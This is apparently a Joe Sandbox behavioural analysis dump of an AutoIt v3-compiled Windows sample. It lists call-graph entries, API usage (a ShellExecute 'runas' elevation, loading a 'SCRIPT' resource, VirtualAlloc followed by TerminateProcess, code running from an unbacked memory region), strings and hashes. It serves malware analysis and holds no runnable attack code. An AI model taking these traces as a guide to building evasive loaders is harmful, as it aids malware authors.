eacbf2 26 API calls 95600->95654 95602->95598 95655 eaca89 ReadFile SetFilePointerEx 95602->95655 95656 e449bd 22 API calls __fread_nolock 95602->95656 95603 e5f179 95603->95222 95607 e46250 95606->95607 95608 e4625f 95606->95608 95607->95196 95608->95607 95609 e46264 
CloseHandle 95608->95609 95609->95607 95611 e4575c CreateFileW 95610->95611 95612 e84035 95610->95612 95613 e4577b 95611->95613 95612->95613 95614 e8403b CreateFileW 95612->95614 95613->95219 95613->95220 95614->95613 95615 e84063 95614->95615 95616 e454c6 3 API calls 95615->95616 95617 e8406e 95616->95617 95617->95613 95619 e453f3 95618->95619 95632 e453f0 ISource 95618->95632 95620 e454c6 3 API calls 95619->95620 95619->95632 95621 e45410 95620->95621 95622 e83f4b 95621->95622 95623 e4541d 95621->95623 95624 e5fa5b 3 API calls 95622->95624 95625 e5fe0b 22 API calls 95623->95625 95624->95632 95626 e45429 95625->95626 95627 e45722 22 API calls 95626->95627 95628 e45433 95627->95628 95629 e49a40 2 API calls 95628->95629 95630 e4543f 95629->95630 95631 e454c6 3 API calls 95630->95631 95631->95632 95632->95228 95633->95234 95634->95232 95635->95235 95636->95239 95637->95191 95638->95191 95639->95218 95640->95230 95642 e454dd 95641->95642 95643 e45564 SetFilePointerEx SetFilePointerEx 95642->95643 95644 e83f9c SetFilePointerEx 95642->95644 95645 e45530 95642->95645 95646 e83f8b 95642->95646 95643->95645 95645->95590 95646->95644 95657 e5f1d8 95647->95657 95653 e5f1c1 95653->95603 95654->95603 95655->95602 95656->95602 95658 e5fe0b 22 API calls 95657->95658 95659 e5f1ef 95658->95659 95660 e5fddb 22 API calls 95659->95660 95661 e5f1a6 95660->95661 95662 e497b6 95661->95662 95669 e49a1e 95662->95669 95665 e497fc 95665->95653 95668 e46e14 24 API calls 95665->95668 95667 e497c7 95667->95665 95676 e49a40 95667->95676 95682 e49b01 22 API calls __fread_nolock 95667->95682 95668->95653 95670 e8f378 95669->95670 95671 e49a2f 95669->95671 95672 e5fddb 22 API calls 95670->95672 95671->95667 95673 e8f382 95672->95673 95674 e5fe0b 22 API calls 95673->95674 95675 e8f397 95674->95675 95677 e49abb 95676->95677 95681 e49a4e 95676->95681 95683 e5e40f SetFilePointerEx 95677->95683 95678 e49a7c 95678->95667 95680 e49a8c ReadFile 95680->95678 95680->95681 95681->95678 95681->95680 
95682->95667 95683->95681 95684->95285 95685->95291 95686->95288 95687->95296 95688->95296 95690 eadbdc GetFileAttributesW 95689->95690 95691 ead4d5 95689->95691 95690->95691 95692 eadbe8 FindFirstFileW 95690->95692 95691->94994 95692->95691 95693 eadbf9 FindClose 95692->95693 95693->95691 95695 e47510 53 API calls 95694->95695 95696 ec7f90 95695->95696 95719 ec7fd5 ISource 95696->95719 95732 ec8cd3 95696->95732 95698 ec8281 95699 ec844f 95698->95699 95704 ec828f 95698->95704 95773 ec8ee4 60 API calls 95699->95773 95702 ec845e 95703 ec846a 95702->95703 95702->95704 95703->95719 95745 ec7e86 95704->95745 95705 e47510 53 API calls 95722 ec8049 95705->95722 95710 ec82c8 95760 e5fc70 95710->95760 95713 ec82e8 95766 eb359c 82 API calls __wsopen_s 95713->95766 95714 ec8302 95767 e463eb 22 API calls 95714->95767 95717 ec82f3 GetCurrentProcess TerminateProcess 95717->95714 95718 ec8311 95768 e46a50 22 API calls 95718->95768 95719->95303 95721 ec832a 95731 ec8352 95721->95731 95769 e504f0 22 API calls 95721->95769 95722->95698 95722->95705 95722->95719 95764 ea417d 22 API calls __fread_nolock 95722->95764 95765 ec851d 42 API calls _strftime 95722->95765 95724 ec84c5 95724->95719 95726 ec84d9 FreeLibrary 95724->95726 95725 ec8341 95770 ec8b7b 75 API calls 95725->95770 95726->95719 95731->95724 95771 e504f0 22 API calls 95731->95771 95772 e4aceb 23 API calls ISource 95731->95772 95774 ec8b7b 75 API calls 95731->95774 95733 e4aec9 22 API calls 95732->95733 95734 ec8cee CharLowerBuffW 95733->95734 95775 ea8e54 95734->95775 95738 e4a961 22 API calls 95739 ec8d2a 95738->95739 95740 e46d25 22 API calls 95739->95740 95741 ec8d3e 95740->95741 95742 e493b2 22 API calls 95741->95742 95744 ec8d48 _wcslen 95742->95744 95743 ec8e5e _wcslen 95743->95722 95744->95743 95782 ec851d 42 API calls _strftime 95744->95782 95746 ec7ea1 95745->95746 95750 ec7eec 95745->95750 95747 e5fe0b 22 API calls 95746->95747 95748 ec7ec3 95747->95748 95749 e5fddb 22 API calls 95748->95749 95748->95750 
95749->95748 95751 ec9096 95750->95751 95752 ec92ab ISource 95751->95752 95759 ec90ba _strcat _wcslen 95751->95759 95752->95710 95753 e4b567 39 API calls 95753->95759 95754 e4b6b5 39 API calls 95754->95759 95755 e4b38f 39 API calls 95755->95759 95756 e47510 53 API calls 95756->95759 95757 e6ea0c 21 API calls ___std_exception_copy 95757->95759 95759->95752 95759->95753 95759->95754 95759->95755 95759->95756 95759->95757 95785 eaefae 24 API calls _wcslen 95759->95785 95762 e5fc85 95760->95762 95761 e5fd1d VirtualAlloc 95763 e5fceb 95761->95763 95762->95761 95762->95763 95763->95713 95763->95714 95764->95722 95765->95722 95766->95717 95767->95718 95768->95721 95769->95725 95770->95731 95771->95731 95772->95731 95773->95702 95774->95731 95776 ea8e74 _wcslen 95775->95776 95777 ea8f63 95776->95777 95780 ea8ea9 95776->95780 95781 ea8f68 95776->95781 95777->95738 95777->95744 95780->95777 95783 e5ce60 41 API calls 95780->95783 95781->95777 95784 e5ce60 41 API calls 95781->95784 95782->95743 95783->95780 95784->95781 95785->95759 95787 e4ae01 95786->95787 95790 e4ae1c ISource 95786->95790 95788 e4aec9 22 API calls 95787->95788 95789 e4ae09 CharUpperBuffW 95788->95789 95789->95790 95790->95007 95792 e4acae 95791->95792 95793 e4acd1 95792->95793 95821 eb359c 82 API calls __wsopen_s 95792->95821 95793->95059 95796 e8fadb 95795->95796 95797 e4ad92 95795->95797 95798 e5fddb 22 API calls 95797->95798 95799 e4ad99 95798->95799 95822 e4adcd 95799->95822 95802->95056 95803->95060 95804->95060 95805->95011 95806->95048 95807->95018 95808->95048 95809->95048 95810->95059 95811->95059 95812->95059 95813->95059 95814->95059 95815->95059 95816->95040 95817->95048 95818->95044 95819->95055 95820->95048 95821->95793 95828 e4addd 95822->95828 95823 e4adb6 95823->95059 95824 e5fddb 22 API calls 95824->95828 95825 e4a961 22 API calls 95825->95828 95826 e4a8c7 22 API calls 95826->95828 95827 e4adcd 22 API calls 95827->95828 95828->95823 95828->95824 95828->95825 95828->95826 95828->95827 95829 
e43156 95832 e43170 95829->95832 95833 e43187 95832->95833 95834 e4318c 95833->95834 95835 e431eb 95833->95835 95872 e431e9 95833->95872 95839 e43265 PostQuitMessage 95834->95839 95840 e43199 95834->95840 95837 e82dfb 95835->95837 95838 e431f1 95835->95838 95836 e431d0 DefWindowProcW 95874 e4316a 95836->95874 95881 e418e2 10 API calls 95837->95881 95843 e4321d SetTimer RegisterWindowMessageW 95838->95843 95844 e431f8 95838->95844 95839->95874 95841 e431a4 95840->95841 95842 e82e7c 95840->95842 95847 e82e68 95841->95847 95848 e431ae 95841->95848 95887 eabf30 34 API calls ___scrt_fastfail 95842->95887 95849 e43246 CreatePopupMenu 95843->95849 95843->95874 95851 e82d9c 95844->95851 95852 e43201 KillTimer 95844->95852 95846 e82e1c 95882 e5e499 42 API calls 95846->95882 95886 eac161 27 API calls ___scrt_fastfail 95847->95886 95854 e82e4d 95848->95854 95855 e431b9 95848->95855 95849->95874 95857 e82da1 95851->95857 95858 e82dd7 MoveWindow 95851->95858 95877 e430f2 Shell_NotifyIconW ___scrt_fastfail 95852->95877 95854->95836 95885 ea0ad7 22 API calls 95854->95885 95862 e431c4 95855->95862 95863 e43253 95855->95863 95856 e82e8e 95856->95836 95856->95874 95864 e82dc6 SetFocus 95857->95864 95865 e82da7 95857->95865 95858->95874 95861 e43263 95861->95874 95862->95836 95883 e430f2 Shell_NotifyIconW ___scrt_fastfail 95862->95883 95879 e4326f 44 API calls ___scrt_fastfail 95863->95879 95864->95874 95865->95862 95868 e82db0 95865->95868 95866 e43214 95878 e43c50 DeleteObject DestroyWindow 95866->95878 95880 e418e2 10 API calls 95868->95880 95872->95836 95875 e82e41 95884 e43837 49 API calls ___scrt_fastfail 95875->95884 95877->95866 95878->95874 95879->95861 95880->95874 95881->95846 95882->95862 95883->95875 95884->95872 95885->95872 95886->95861 95887->95856 95888 e42e37 95889 e4a961 22 API calls 95888->95889 95890 e42e4d 95889->95890 95967 e44ae3 95890->95967 95892 e42e6b 95893 e43a5a 24 API calls 95892->95893 95894 e42e7f 95893->95894 95895 e49cb3 22 API calls 95894->95895 

                                          Control-flow Graph (rendered graph omitted)
                                          APIs
                                          • GetVersionExW.KERNEL32 ref: 00E4430D
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • GetCurrentProcess.KERNEL32 ref: 00E44422
                                          • IsWow64Process.KERNEL32(00000000), ref: 00E44429
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44454
                                          • GetProcAddress.KERNEL32 ref: 00E44466
                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00E44474
                                          • FreeLibrary.KERNEL32 ref: 00E4447B
                                          • GetSystemInfo.KERNEL32(?), ref: 00E444A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                          • API String ID: 3290436268-3101561225
                                          • Opcode ID: 55941ee0db4d2db7a7b1c936f5701276e1fbcfd795493416a6c3f8266a7ba100
                                          • Instruction ID: 7e891b8ae1a9f849d49a28f14ab25ab6c192494d1c276d11c875a358c8364e24
                                          • Opcode Fuzzy Hash: 55941ee0db4d2db7a7b1c936f5701276e1fbcfd795493416a6c3f8266a7ba100
                                          • Instruction Fuzzy Hash: 08A1E9A190A2CCCFCB11D7B97C443D57FE47B26744F1AE49AD2B5B3A6AD2204508FB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph omitted)
                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00E442B2
                                          • FindResourceExW.KERNEL32 ref: 00E442C9
                                          • LoadResource.KERNEL32 ref: 00E835BE
                                          • SizeofResource.KERNEL32 ref: 00E835D3
                                          • LockResource.KERNEL32(00E450AA), ref: 00E835E6
                                          Strings
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: bf7bf6858f7e86f03d62575d058c309ed6313114d24fcc938d0133725c613de7
                                          • Instruction ID: caefd118e8bb3fa077b05847d81d1a1f8703c33c99367eba407977702178dde0
                                          • Opcode Fuzzy Hash: bf7bf6858f7e86f03d62575d058c309ed6313114d24fcc938d0133725c613de7
                                          • Instruction Fuzzy Hash: BA1170B0201701BFDB219B66EC48F677BB9EBC5B95F20416EB406A62A0DBB1D804C620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph omitted)
                                          APIs
                                          • lstrlenW.KERNEL32 ref: 00EADBCE
                                          • GetFileAttributesW.KERNELBASE ref: 00EADBDD
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00EADBEE
                                          • FindClose.KERNEL32(00000000), ref: 00EADBFA
                                          Strings
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                          • String ID: "R
                                          • API String ID: 2695905019-1746183819
                                          • Opcode ID: 23680e49f2c7b13fb65c4a8b442a3f815f9aa95cd02b832c9cda0759f026c88c
                                          • Instruction ID: 1ad0a862d29b0573d466b0620cedc4557a32206d62cf6bf6475ea8b42e7b5180
                                          • Opcode Fuzzy Hash: 23680e49f2c7b13fb65c4a8b442a3f815f9aa95cd02b832c9cda0759f026c88c
                                          • Instruction Fuzzy Hash: 49F0A7304159155B82206B78AC0D4AA777CDF06374B604713F476E24F0EBB46D58C595
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00E42B6B
                                            • Part of subcall function 00E43A5A: GetModuleFileNameW.KERNEL32 ref: 00E43A78
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • GetForegroundWindow.USER32 ref: 00E82C10
                                          • ShellExecuteW.SHELL32(00000000,?,?,00F02224), ref: 00E82C17
                                          Strings
                                          Similarity
                                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                          • String ID: runas
                                          • API String ID: 448630720-4000483414
                                          • Opcode ID: 8655c0df3c7291004170dd55efd969aa765f09b9c66caea49f4c7f2c473399b2
                                          • Instruction ID: f46fb37f4ff973cf8c4d50e6498dad5a10b0db843badc3088fa0bd293791ae82
                                          • Opcode Fuzzy Hash: 8655c0df3c7291004170dd55efd969aa765f09b9c66caea49f4c7f2c473399b2
                                          • Instruction Fuzzy Hash: 7B11E1316083056AC704FF70F8559AEB7E4EB95744F84342DF286320A3CF618A49E712
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32 ref: 00E7337E
                                          Strings
                                          Similarity
                                          • API ID: Time$FileSystem
                                          • String ID: GetSystemTimePreciseAsFileTime
                                          • API String ID: 2086374402-595813830
                                          • Opcode ID: 4ae1846c689d806d97b816933502de8857f8cd0ace1e755a1fe0004b796c8019
                                          • Instruction ID: e446938e3778a54dfe950c199613cbcdbfe81bf71860c653c915eb28496382a7
                                          • Opcode Fuzzy Hash: 4ae1846c689d806d97b816933502de8857f8cd0ace1e755a1fe0004b796c8019
                                          • Instruction Fuzzy Hash: 2FE0E531B4131CBFD320AFA6AC02D7EBBD4DB48B90B40525DFA097B661CE310E00A6D6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00E609DA
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 128992c9a0924e98686d029631696cc138958293d2a4f309f701d02586dc4cb1
                                          • Instruction ID: a51352dea29d5da1aae6c28f4b69eb0c5a151e18a0a3b1a529b1576b1b15d2aa
                                          • Opcode Fuzzy Hash: 128992c9a0924e98686d029631696cc138958293d2a4f309f701d02586dc4cb1
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetInputState.USER32 ref: 00E4D807
                                          • timeGetTime.WINMM ref: 00E4DA07
                                          • PeekMessageW.USER32(?), ref: 00E4DB28
                                          • TranslateMessage.USER32(?), ref: 00E4DB7B
                                          • DispatchMessageW.USER32(?), ref: 00E4DB89
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4DB9F
                                          • Sleep.KERNEL32(0000000A), ref: 00E4DBB1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                          • String ID:
                                          • API String ID: 2189390790-0
                                          • Opcode ID: 00ea24a60fceacd60a2caebd8b739032ce0b5e2ba8591e42d30cf76f2947253a
                                          • Instruction ID: 76e950fc517d326a126ad6d4ba2887cbe8280b2359fa1bcecc8b89633475a5ee
                                          • Opcode Fuzzy Hash: 00ea24a60fceacd60a2caebd8b739032ce0b5e2ba8591e42d30cf76f2947253a
                                          • Instruction Fuzzy Hash: AE32C330608342EFDB28CF24DC84BAAB7E1FF85308F14A55EE655A7291D771E844DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-3963672497
                                          • Opcode ID: 2d03679ce215338fdbec8dbb71d62f470b65918346b897830186462c8c3d5592
                                          • Instruction ID: 01b15b178c08e32abd94f0ceea9bf65856c3ced2908146a2ba4fb7a69d4c1d28
                                          • Opcode Fuzzy Hash: 2d03679ce215338fdbec8dbb71d62f470b65918346b897830186462c8c3d5592
                                          • Instruction Fuzzy Hash: 2FC10274A44249AFCB11DFA8E845BEDBBF0AF5A314F189199F518B7392CB308941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E8039A: CreateFileW.KERNELBASE(00000000,00000000,?,00E80704,?,?,00000000), ref: 00E803B7
                                          • GetLastError.KERNEL32 ref: 00E8076F
                                          • __dosmaperr.LIBCMT ref: 00E80776
                                          • GetFileType.KERNELBASE ref: 00E80782
                                          • GetLastError.KERNEL32 ref: 00E8078C
                                          • __dosmaperr.LIBCMT ref: 00E80795
                                          • CloseHandle.KERNEL32(00000000), ref: 00E807B5
                                          • CloseHandle.KERNEL32(?), ref: 00E808FF
                                          • GetLastError.KERNEL32 ref: 00E80931
                                          • __dosmaperr.LIBCMT ref: 00E80938
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: bb69f6e68918d2510af801f9492ac9b0690b822613d4545590ae60814c7113f8
                                          • Instruction ID: ae7644bbac790e77f938957f31d143e5fc07c5f795180ae25235f0550d80ef6d
                                          • Opcode Fuzzy Hash: bb69f6e68918d2510af801f9492ac9b0690b822613d4545590ae60814c7113f8
                                          • Instruction Fuzzy Hash: ACA12832A001088FDF19FF68D852BAD7BE0EB46324F14515AF819BB2A1DB319857DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E43A5A: GetModuleFileNameW.KERNEL32 ref: 00E43A78
                                            • Part of subcall function 00E43357: GetFullPathNameW.KERNEL32 ref: 00E43379
                                          • RegOpenKeyExW.KERNEL32 ref: 00E4356A
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E8318D
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00E831CE
                                          • RegCloseKey.ADVAPI32(?), ref: 00E83210
                                          • _wcslen.LIBCMT ref: 00E83277
                                          • _wcslen.LIBCMT ref: 00E83286
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 98802146-2727554177
                                          • Opcode ID: d983599744ef26319b2e722420e97616d66c5f267ca3526e6d6596c343b657bf
                                          • Instruction ID: 57395be05b935978e8c3e4806856c8ef9ad9b418b38b557ed1ab86f643a0d5ec
                                          • Opcode Fuzzy Hash: d983599744ef26319b2e722420e97616d66c5f267ca3526e6d6596c343b657bf
                                          • Instruction Fuzzy Hash: FA71D2714053059EC304EFA9EC8299BBBE8FF84740F41682EF559E31B1EB348A58DB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32 ref: 00E42B8E
                                          • LoadCursorW.USER32 ref: 00E42B9D
                                          • LoadIconW.USER32 ref: 00E42BB3
                                          • LoadIconW.USER32 ref: 00E42BC5
                                          • LoadIconW.USER32 ref: 00E42BD7
                                          • LoadImageW.USER32 ref: 00E42BEF
                                          • RegisterClassExW.USER32(?), ref: 00E42C40
                                            • Part of subcall function 00E42CD4: GetSysColorBrush.USER32 ref: 00E42D07
                                            • Part of subcall function 00E42CD4: RegisterClassExW.USER32(00000030), ref: 00E42D31
                                            • Part of subcall function 00E42CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E42D42
                                            • Part of subcall function 00E42CD4: InitCommonControlsEx.COMCTL32(?), ref: 00E42D5F
                                            • Part of subcall function 00E42CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E42D6F
                                            • Part of subcall function 00E42CD4: LoadIconW.USER32 ref: 00E42D85
                                            • Part of subcall function 00E42CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E42D94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 0b06074dbe8a0b1bb6dff4812a178da5b4f906c99f0348c7573943ad9342f674
                                          • Instruction ID: a8e15f0da920cc09ad9ab405f9d24cefa9c2440b6be9bc3cc87eaad3762d1764
                                          • Opcode Fuzzy Hash: 0b06074dbe8a0b1bb6dff4812a178da5b4f906c99f0348c7573943ad9342f674
                                          • Instruction Fuzzy Hash: AD212C70E02318AFDB109FA6EC55ADABFB4FB48B50F11801BF610B66A4D7B11554EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E4316A,?,?), ref: 00E431D8
                                          • KillTimer.USER32 ref: 00E43204
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E43227
                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E4316A,?,?), ref: 00E43232
                                          • CreatePopupMenu.USER32 ref: 00E43246
                                          • PostQuitMessage.USER32 ref: 00E43267
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: 806b1b2f377bd059a9c80e5dc65e653f2392138e6fc9cc9b97b4012e4ce08abe
                                          • Instruction ID: 2a377c38c5a62043a303c5bc28dd601c09dcf0c99326e1c8e4def471f4382e36
                                          • Opcode Fuzzy Hash: 806b1b2f377bd059a9c80e5dc65e653f2392138e6fc9cc9b97b4012e4ce08abe
                                          • Instruction Fuzzy Hash: D6417B30200208ABDF142B78BC1DBF93B59F705348F14711AFA1AB62E2C7B1AB40E765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001126F1
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00112917
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction ID: a36b8f46aa39995f9e1eac946769f8343e3f5976259c39a751691aa0ff9022ed
                                          • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction Fuzzy Hash: 7BA12974E00209EBDB18CFA4C895BEEBBB5FF58304F208169E511BB280D7759A91DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: edabfae8857b9f2b0d488673203de7f344c6027160587d23f67ca3b683416563
                                          • Instruction ID: bc9f3359cccb8720cea0bde07ff5bc6fc13a9419a90f451349e5538d3cdab25a
